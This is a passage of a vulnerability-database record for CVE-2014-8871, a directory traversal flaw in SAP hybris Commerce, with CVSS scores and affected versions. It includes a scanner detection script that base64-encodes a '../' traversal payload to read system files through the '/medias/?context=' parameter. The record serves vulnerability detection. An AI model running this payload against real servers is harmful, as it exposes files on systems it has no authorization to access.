script_xref(name:\"URL\", value:\"https://www.redteam-pentesting.de/advisories/rt-sa-2014-016\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default:80);\n\nfiles = traversal_files();\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n payload_clear = \"master|root|12345|text/plain|../../../../../../\" + file + \"|\";\n payload_encoded = base64(str:payload_clear);\n\n url = '/medias/?context=' + payload_encoded;\n\n req = http_get(port:port, item:url);\n res = http_keepalive_send_recv(port:port, data:req);\n\n if (res && egrep(string:res, pattern:pattern)) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T15:14:24", "description": "Directory traversal vulnerability in hybris Commerce software suite 5.0.3.3 and earlier, 5.0.0.3 and earlier, 5.0.4.4 and earlier, 5.1.0.1 and earlier, 5.1.1.2 and earlier, 5.2.0.3 and earlier, and 5.3.0.1 and earlier.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-08-28T15:29:00", "type": "cve", "title": "CVE-2014-8871", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8871"], "modified": "2019-08-27T16:12:00", "cpe": ["cpe:/a:sap:hybris:5.3.0.1", "cpe:/a:sap:hybris:5.0.4.4", "cpe:/a:sap:hybris:5.2.0.3", "cpe:/a:sap:hybris:5.1.0.1", "cpe:/a:sap:hybris:5.1.1.2", "cpe:/a:sap:hybris:5.0.0.3", "cpe:/a:sap:hybris:5.0.3.3"], "id": "CVE-2014-8871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8871", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sap:hybris:5.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:sap:hybris:5.0.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:sap:hybris:5.0.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:sap:hybris:5.1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:sap:hybris:5.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:sap:hybris:5.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:sap:hybris:5.0.3.3:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2021-06-08T18:49:18", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2015-02-23T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-8630", "CVE-2015-1614", "CVE-2014-8871", "CVE-2015-1364", "CVE-2014-5360", "CVE-2015-1435", "CVE-2015-1436", "CVE-2014-9465", "CVE-2014-9331", "CVE-2015-1518", "CVE-2015-1585", "CVE-2015-1467", "CVE-2015-1517", "CVE-2015-1172", "CVE-2015-1434", "CVE-2015-1363"], "modified": "2015-02-23T00:00:00", "id": "SECURITYVULNS:VULN:14273", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14273", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
